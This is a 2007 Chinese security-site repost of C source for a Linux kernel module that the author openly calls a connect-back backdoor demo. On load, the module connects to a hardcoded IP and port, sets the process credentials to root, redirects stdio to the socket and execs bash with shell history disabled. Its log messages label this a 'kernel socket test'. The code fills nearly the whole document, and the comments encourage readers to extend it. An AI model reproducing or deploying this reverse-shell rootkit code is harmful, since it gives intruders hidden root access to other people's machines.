一个简单的内核后门原型
www.8tops.com
2007-10-27 10:25:44 发布:尼奥
媒体:<wzt#xsec.org> 作者:wzt
这是一个在内核模块中实现的反连后门,大家看看这于应用层上的实现有什么不同吧,呵呵
/*
* Kernel mode connect backdoor,haha~
*
* just a demo module to teach you how to write a backdoor in kernel mode,
* i belive you can add more code to make it strong and powerful,wulala.
*
* by wzt <wzt#xsec.org>
*
*/
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/socket.h>
#include <linux/net.h>
#include <linux/in.h>
#include <linux/fs.h>
#include <linux/file.h>
#include <linux/types.h>
#include <linux/errno.h>
#include <linux/string.h>
#include <linux/unistd.h>
#include <net/sock.h>
#include <asm/uaccess.h>
#include <asm/unistd.h>
#include "syscalls.h"
#define REMOTO_IP "192.168.75.1"
#define port 1080
MODULE_LICENSE("GPL");
MODULE_AUTHOR("wzt");
static inline my_syscall2(int, dup2, int, oldfd, int, newfd);
static char *earg[4] = { "/bin/bash", "--noprofile", "--norc", NULL };
char *env[]={
"TERM=linux",
"HOME=" HOME,
"PATH=/bin:/usr/bin:/sbin:/usr/sbin:/usr/local/bin"
":/usr/local/sbin",
"HISTFILE=/dev/null",
NULL };
int k_connect(void)
{
struct task_struct *tsk = current;
struct socket *sock,*newsock;
struct sockaddr_in server;
int sockfd,i;
int error = 0,len = sizeof(struct sockaddr);
set_fs(KERNEL_DS);
error = sock_create(AF_INET,SOCK_STREAM,0,&sock);
if (error < 0) {
printk("[-] socket_create failed: %d\n",error);
sock_release(sock);
return -1;
}
sockfd = sock_map_fd(sock);
if (sockfd < 0) {
printk("[-] sock_map_fd() failed.\n");
sock_release(sock);
return -1;
}
for (i = 0; i < 8; i++)
server.sin_zero[i] = 0;
server.sin_family = PF_INET;
server.sin_addr.s_addr = in_aton(REMOTO_IP);
server.sin_port = htons(port);
error = sock->ops->connect(sock,(struct sockaddr *)&server,len,sock->file->f_flags);
if (error < 0) {
printk("[-] connect to %s failed.\n",REMOTO_IP);
return -1;
}
printk("[+] connect to %s ok.\n",REMOTO_IP);
set_fs(KERNEL_DS);
tsk->uid = 0;
tsk->euid = 0;
tsk->gid = 0x11111111;
tsk->egid = 0;
dup2(sockfd,0);
dup2(sockfd,1);
dup2(sockfd,2);
execve(earg[0], (const char **) earg, (const char **) env);
return 1;
}
int k_socket_init(void)
{
printk("[+] kernel socket test start.\n");
k_connect();
}
void k_socket_exit(void)
{
printk("[+] kernel socket test over.\n");
}
module_init(k_socket_init);
module_exit(k_socket_exit);
E-file:尼奥
